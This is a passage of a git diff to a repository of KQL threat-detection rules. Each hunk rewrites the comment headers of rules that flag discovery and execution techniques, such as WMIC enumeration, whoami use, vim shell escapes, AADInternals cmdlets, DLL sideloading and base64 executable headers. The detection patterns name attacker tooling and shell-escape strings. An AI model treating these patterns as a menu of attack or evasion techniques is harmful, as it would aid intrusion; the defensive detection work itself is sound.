 | where RemotePort == 9389 and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Microsoft Monitoring Agent\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.ex" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\WindowsPowerShell\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql
index ca8c4e76..a0645f69 100644
--- a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql
+++ b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql
@@ -1,13 +1,13 @@
-// Title: Uncommon System Information Discovery Via Wmic.EXE
-// Author: TropChaud
-// Date: 2023-01-26
-// Level: medium
-// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
-// including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
-// and GPU driver products/versions.
-// Some of these commands were used by Aurora Stealer in late 2022/early 2023.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-
-DeviceProcessEvents
+// Title: Uncommon System Information Discovery Via Wmic.EXE
+// Author: TropChaud
+// Date: 2023-01-26
+// Level: medium
+// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
+// including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
+// and GPU driver products/versions.
+// Some of these commands were used by Aurora Stealer in late 2022/early 2023.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "LOGICALDISK get Name,Size,FreeSpace" or ProcessCommandLine contains "os get Caption,OSArchitecture,Version") and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/use_of_w32tm_as_timer.kql b/KQL/rules/Discovery/use_of_w32tm_as_timer.kql
index 8c26bd44..bbc2164c 100644
--- a/KQL/rules/Discovery/use_of_w32tm_as_timer.kql
+++ b/KQL/rules/Discovery/use_of_w32tm_as_timer.kql
@@ -1,12 +1,12 @@
-// Title: Use of W32tm as Timer
-// Author: frack113
-// Date: 2022-09-25
-// Level: high
-// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1124
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Use of W32tm as Timer
+// Author: frack113
+// Date: 2022-09-25
+// Level: high
+// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1124
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/stripchart" and ProcessCommandLine contains "/computer:" and ProcessCommandLine contains "/period:" and ProcessCommandLine contains "/dataonly" and ProcessCommandLine contains "/samples:") and (FolderPath endswith "\\w32tm.exe" or ProcessVersionInfoOriginalFileName =~ "w32time.dll")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql b/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql
index 839b5d76..c5f6fa7c 100644
--- a/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql
+++ b/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql
@@ -1,12 +1,12 @@
-// Title: User Discovery And Export Via Get-ADUser Cmdlet
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-09
-// Level: medium
-// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1033
-// False Positives:
-// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
-
-DeviceProcessEvents
+// Title: User Discovery And Export Via Get-ADUser Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: medium
+// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033
+// False Positives:
+// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADUser " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql
index f0532d8f..62f7be84 100644
--- a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql
+++ b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql
@@ -1,11 +1,11 @@
-// Title: Vim GTFOBin Abuse - Linux
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-28
-// Level: high
-// Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands.
-// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-
-DeviceProcessEvents
+// Title: Vim GTFOBin Abuse - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: high
+// Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands.
+// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ":!/" or ProcessCommandLine contains ":lua " or ProcessCommandLine contains ":py " or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " --cmd" or ProcessCommandLine contains " -c ") and (FolderPath endswith "/rvim" or FolderPath endswith "/vim" or FolderPath endswith "/vimdiff"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/whoami_as_parameter.kql b/KQL/rules/Discovery/whoami_as_parameter.kql
index 5f1484b0..7db1a91e 100644
--- a/KQL/rules/Discovery/whoami_as_parameter.kql
+++ b/KQL/rules/Discovery/whoami_as_parameter.kql
@@ -1,10 +1,10 @@
-// Title: WhoAmI as Parameter
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-11-29
-// Level: high
-// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-
-DeviceProcessEvents
+// Title: WhoAmI as Parameter
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-29
+// Level: high
+// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains ".exe whoami"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql b/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql
index 16cf3b82..4f760137 100644
--- a/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql
+++ b/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql
@@ -1,14 +1,14 @@
-// Title: Whoami.EXE Execution Anomaly
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-08-12
-// Level: medium
-// Description: Detects the execution of whoami.exe with suspicious parent processes.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-// False Positives:
-// - Admin activity
-// - Scripts and administrative tools used in the monitored environment
-// - Monitoring activity
-
-DeviceProcessEvents
+// Title: Whoami.EXE Execution Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-12
+// Level: medium
+// Description: Detects the execution of whoami.exe with suspicious parent processes.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+// False Positives:
+// - Admin activity
+// - Scripts and administrative tools used in the monitored environment
+// - Monitoring activity
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") and (not(((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") or (InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath)))) and (not(InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql b/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql
index e765acfc..39356810 100644
--- a/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql
+++ b/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql
@@ -1,10 +1,10 @@
-// Title: Whoami.EXE Execution With Output Option
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-28
-// Level: medium
-// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-
-DeviceProcessEvents
+// Title: Whoami.EXE Execution With Output Option
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: medium
+// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " /FO CSV" or ProcessCommandLine contains " -FO CSV") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")) or ProcessCommandLine =~ "*whoami*>*"
\ No newline at end of file
diff --git a/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql b/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql
index dbd6c8f4..2c8d2c8b 100644
--- a/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql
+++ b/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql
@@ -1,12 +1,12 @@
-// Title: AADInternals PowerShell Cmdlets Execution - ProccessCreation
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2022-12-23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential-access, attack.impact
-// False Positives:
-// - Legitimate use of the library for administrative activity
-
-DeviceProcessEvents
+// Title: AADInternals PowerShell Cmdlets Execution - ProccessCreation
+// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2022-12-23
+// Level: high
+// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. 
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential-access, attack.impact
+// False Positives:
+// - Legitimate use of the library for administrative activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Find-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Initialize-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Reset-AADInt" or ProcessCommandLine contains "Resolve-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Save-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Unprotect-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql b/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql
index b0057dbd..a98f0e08 100644
--- a/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql
+++ b/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql
@@ -1,10 +1,10 @@
-// Title: Abusable DLL Potential Sideloading From Suspicious Location
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-07-11
-// Level: high
-// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceImageLoadEvents
+// Title: Abusable DLL Potential Sideloading From Suspicious Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-11
+// Level: high
+// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\coreclr.dll" or FolderPath endswith "\\facesdk.dll" or FolderPath endswith "\\HPCustPartUI.dll" or FolderPath endswith "\\libcef.dll" or FolderPath endswith "\\ZIPDLL.dll") and ((FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Windows\\Temp\\") or ((FolderPath contains ":\\Users\\" and FolderPath contains "\\Favorites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Favourites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Contacts\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql b/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql
index 256d0222..282b4570 100644
--- a/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql
+++ b/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql
@@ -1,12 +1,12 @@
-// Title: Add Windows Capability Via PowerShell Cmdlet
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-22
-// Level: medium
-// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.
-
-DeviceProcessEvents
+// Title: Add Windows Capability Via PowerShell Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "OpenSSH." and ProcessCommandLine contains "Add-WindowsCapability" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql b/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql
index cbcf3626..251fea5d 100644
--- a/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql
+++ b/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql
@@ -1,10 +1,10 @@
-// Title: Adwind RAT / JRAT File Artifact
-// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
-// Date: 2017-11-10
-// Level: high
-// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007
-
-DeviceFileEvents
+// Title: Adwind RAT / JRAT File Artifact
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+// Date: 2017-11-10
+// Level: high
+// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceFileEvents
 | where (FolderPath contains "\\AppData\\Roaming\\Oracle\\bin\\java" and FolderPath contains ".exe") or (FolderPath contains "\\Retrive" and FolderPath contains ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/Execution/application_removed_via_wmic_exe.kql b/KQL/rules/Execution/application_removed_via_wmic_exe.kql
index edd5d8c9..c7b87fa2 100644
--- a/KQL/rules/Execution/application_removed_via_wmic_exe.kql
+++ b/KQL/rules/Execution/application_removed_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: Application Removed Via Wmic.EXE
-// Author: frack113
-// Date: 2022-01-28
-// Level: medium
-// Description: Detects the removal or uninstallation of an application via "Wmic.EXE".
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-
-DeviceProcessEvents
+// Title: Application Removed Via Wmic.EXE
+// Author: frack113
+// Date: 2022-01-28
+// Level: medium
+// Description: Detects the removal or uninstallation of an application via "Wmic.EXE".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/application_terminated_via_wmic_exe.kql b/KQL/rules/Execution/application_terminated_via_wmic_exe.kql
index 4fdd3ae8..331de52b 100644
--- a/KQL/rules/Execution/application_terminated_via_wmic_exe.kql
+++ b/KQL/rules/Execution/application_terminated_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: Application Terminated Via Wmic.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-09-11
-// Level: medium
-// Description: Detects calls to the "terminate" function via wmic in order to kill an application
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-
-DeviceProcessEvents
+// Title: Application Terminated Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-11
+// Level: medium
+// Description: Detects calls to the "terminate" function via wmic in order to kill an application
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "call" and ProcessCommandLine contains "terminate") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql b/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql
index da6e5306..a81e8577 100644
--- a/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql
+++ b/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql
@@ -1,12 +1,12 @@
-// Title: Arbitrary Binary Execution Using GUP Utility
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-10
-// Level: medium
-// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Other parent binaries using GUP not currently identified
-
-DeviceProcessEvents
+// Title: Arbitrary Binary Execution Using GUP Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-10
+// Level: medium
+// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Other parent binaries using GUP not currently identified
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(((ProcessCommandLine contains "\\Notepad++\\notepad++.exe" and FolderPath endswith "\\explorer.exe") or isnull(ProcessCommandLine) or InitiatingProcessFolderPath contains "\\Notepad++\\updater\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql b/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql
index dbd9319e..2343874d 100644
--- a/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql
+++ b/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql
@@ -1,10 +1,10 @@
-// Title: Arbitrary MSI Download Via Devinit.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-01-11
-// Level: medium
-// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Arbitrary MSI Download Via Devinit.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: medium
+// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http"
\ No newline at end of file
diff --git a/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql b/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql
index 48bb255a..785b6fc6 100644
--- a/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql
+++ b/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql
@@ -1,10 +1,10 @@
-// Title: Arbitrary Shell Command Execution Via Settingcontent-Ms
-// Author: Sreeman
-// Date: 2020-03-13
-// Level: medium
-// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
-// MITRE Tactic: Execution
-// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial-access
-
-DeviceProcessEvents
+// Title: Arbitrary Shell Command Execution Via Settingcontent-Ms
+// Author: Sreeman
+// Date: 2020-03-13
+// Level: medium
+// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
+// MITRE Tactic: Execution
+// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial-access
+
+DeviceProcessEvents
 | where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql
index 5dae167d..45ac03b2 100644
--- a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql
+++ b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql
@@ -1,12 +1,12 @@
-// Title: Assembly DLL Creation Via AspNetCompiler
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-14
-// Level: medium
-// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Legitimate assembly compilation using a build provider
-
-DeviceFileEvents
+// Title: Assembly DLL Creation Via AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: medium
+// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate assembly compilation using a build provider
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" and (FolderPath contains "\\Temporary ASP.NET Files\\" and FolderPath contains "\\assembly\\tmp\\" and FolderPath contains ".dll")
\ No newline at end of file
diff --git a/KQL/rules/Execution/base64_mz_header_in_commandline.kql b/KQL/rules/Execution/base64_mz_header_in_commandline.kql
index deff3393..cb703139 100644
--- a/KQL/rules/Execution/base64_mz_header_in_commandline.kql
+++ b/KQL/rules/Execution/base64_mz_header_in_commandline.kql
@@ -1,12 +1,12 @@
-// Title: Base64 MZ Header In CommandLine
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-12
-// Level: high
-// Description: Detects encoded base64 MZ header in the commandline
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Base64 MZ Header In CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects encoded base64 MZ header in the commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "TVqQAAMAAAAEAAAA" or ProcessCommandLine contains "TVpQAAIAAAAEAA8A" or ProcessCommandLine contains "TVqAAAEAAAAEABAA" or ProcessCommandLine contains "TVoAAAAAAAAAAAAA" or ProcessCommandLine contains "TVpTAQEAAAAEAAAA"
\ No newline at end of file
diff --git a/KQL/rules/Execution/bash_interactive_shell.kql b/KQL/rules/Execution/bash_interactive_shell.kql
index 0d0ba1f4..48f6a90f 100644
--- a/KQL/rules/Execution/bash_interactive_shell.kql
+++ b/KQL/rules/Execution/bash_interactive_shell.kql
@@ -1,10 +1,10 @@
-// Title: Bash Interactive Shell
-// Author: @d4ns4n_
-// Date: 2023-04-07
-// Level: low
-// Description: Detects execution of the bash shell with the interactive flag "-i".
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Bash Interactive Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: low
+// Description: Detects execution of the bash shell with the interactive flag "-i".
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -i " and FolderPath endswith "/bash"
\ No newline at end of file
diff --git a/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql b/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql
index 4b800d52..e40790aa 100644
--- a/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql
+++ b/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql
@@ -1,12 +1,12 @@
-// Title: Binary Proxy Execution Via Dotnet-Trace.EXE
-// Author: Jimmy Bayne (@bohops)
-// Date: 2024-01-02
-// Level: medium
-// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate usage of the utility in order to debug and trace a program.
-
-DeviceProcessEvents
+// Title: Binary Proxy Execution Via Dotnet-Trace.EXE
+// Author: Jimmy Bayne (@bohops)
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of the utility in order to debug and trace a program.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll")
\ No newline at end of file
diff --git a/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql b/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql
index 94cd4f50..c7b1deda 100644
--- a/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql
+++ b/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql
@@ -1,12 +1,12 @@
-// Title: BPFtrace Unsafe Option Usage
-// Author: Andreas Hunkeler (@Karneades)
